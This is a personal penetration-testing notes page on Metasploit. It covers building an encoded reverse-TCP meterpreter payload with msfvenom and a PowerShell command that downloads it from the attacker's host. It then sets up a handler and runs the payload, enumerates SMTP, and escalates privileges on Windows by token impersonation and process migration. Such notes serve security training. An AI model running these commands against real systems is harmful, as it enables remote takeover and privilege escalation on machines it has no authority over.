CyberNotes
Exploitation/Metasploit

Metasploit

Metasploit is a powerful penetration testing and hacking framework designed to secure networks, services, and applications by identifying and exploiting vulnerabilities

Metasploit can be used in countless ways. These are just a few things I found interesting and helpful along the way.

Upgrade Powershell to Metrepreter

If you are able to land a standard powershell connection from the victim machine, you can upgrade the shell to a meterpreter shell.

This payload generates an encoded x86-64 reverse TCP meterpreter payload.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.57.139 LPORT=1224 -f exe -o upgradeShell.exe

After creating this payload, download it to the machine using the same method in the previous step:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.6.57.139:80/upgradeShell.exe','upgradeShell.exe')"

Before running this program, ensure the handler is set up in Metasploit:

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.6.57.139 set LPORT 1224 run

Once this is running, enter this command to start the reverse shell

Start-Process "upgradeShell.exe"

SMTP

Simple Mail Transfer protocol

Poorly configured or vulnerable mail servers can often provide an initial foothold into a network, but prior to launching an attack, we want to fingerprint the server to make our targeting as precise as possible. We're going to use the "smtp_version" module in MetaSploit to do this. As its name implies, it will scan a range of IP addresses and determine the version of any mail servers it encounters.

Search "smtp_version"

  • auxiliary/scanner/smtp/smtp_version
  • Set RHOSTS
  • Exploit

Search "smtp_enum"

  • auxiliary/scanner/smtp/smtp_enum
  • Set USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
  • Set RHOSTS
  • Exploit

Windows Escalation Technique

SeDebugPrivilege / SeImpersonatePrivilege

If these two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled, wec can use the incognito module in metasploit to exploit this vulnerability.

use incognito

You may need to use the load incognito command if the previous command doesn't work.

Check which tokens are available:

list_tokens -g

Use this command to impersonate the Administrator's token if it is available:

impersonate_token "BUILTIN\Administrators"

Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do)

The safest process to pick is the services.exe process. First, use the ps command to view processes and find the PID of the services.exe process.

Migrate to this process using the command

migrate PID-OF-PROCESS

Escalation

Common ways for the attacker to gain and execute commands with elevated privileges

Meterpreter

A list of commonly used meterpreter commands

On this page